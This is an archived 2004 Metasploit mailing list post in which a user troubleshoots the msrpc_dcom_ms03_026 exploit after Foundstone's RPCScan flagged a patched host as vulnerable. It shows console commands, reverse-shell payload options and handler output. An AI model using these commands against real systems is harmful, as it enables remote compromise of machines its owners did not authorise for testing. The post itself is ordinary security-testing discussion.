Metasploit mailing list archives
RPCScan v2.03 vs exploit msrpc_dcom_ms03_026
From: itorres at litronic.com (Israel Torres)
Date: Thu, 19 Aug 2004 07:25:27 -0700
Hi,

2 questions:

I have run *Foundstone's RPCScan v2.03 on a SP4 system to find that it is resulting in VULNERABLE. When I use and configure msrpc_dcom_ms03_026 (with either win32_reverse, or win32_reverse_vncinject) the following error is returned:

    msf msrpc_dcom_ms03_026(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Connected to REMACT with group ID 0x6317
    [*] Exiting Reverse Handler.

I have run this exploit on this machine unpatched and it operated as expected (successfully exploitable with either payload above). Is Foundstone's tool just not working correctly? (as it seems)

The last question I have been unable to find an answer for is setting the TARGET does not work by simply stating:

    set TARGET 2K
    set TARGET Windows 2K

since both result in

    Target: Target Not Specified

only

    set TARGET ALL

will configure for

    Target: Windows NT SP6/2K/XP ALL

Thanks for your help,
Israel Torres

    Exploit and Payload Options
    ===========================

      Exploit:    Name      Default    Description
      --------    ------    -------    ------------------
      required    RHOST     itest      The target address
      required    RPORT     135        The target port

      Payload:    Name        Default    Description
      --------    --------    -------    ------------------------------------------
      optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
      required    LHOST       itorres    Local address to receive connection
      required    LPORT       4321       Local port to receive connection

      Target: Windows NT SP6/2K/XP ALL

REF:-----------------------------
References:

*RPCScan v2.03
RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.
http://www.foundstone.com/resources/termsofuse.htm?file=rpcscan2.zip
Current thread:
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Israel Torres (Aug 19)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 H D Moore (Aug 19)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 odinanne (Aug 20)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 Carric Dooley (Aug 21)
- RPCScan v2.03 vs exploit msrpc_dcom_ms03_026 H D Moore (Aug 19)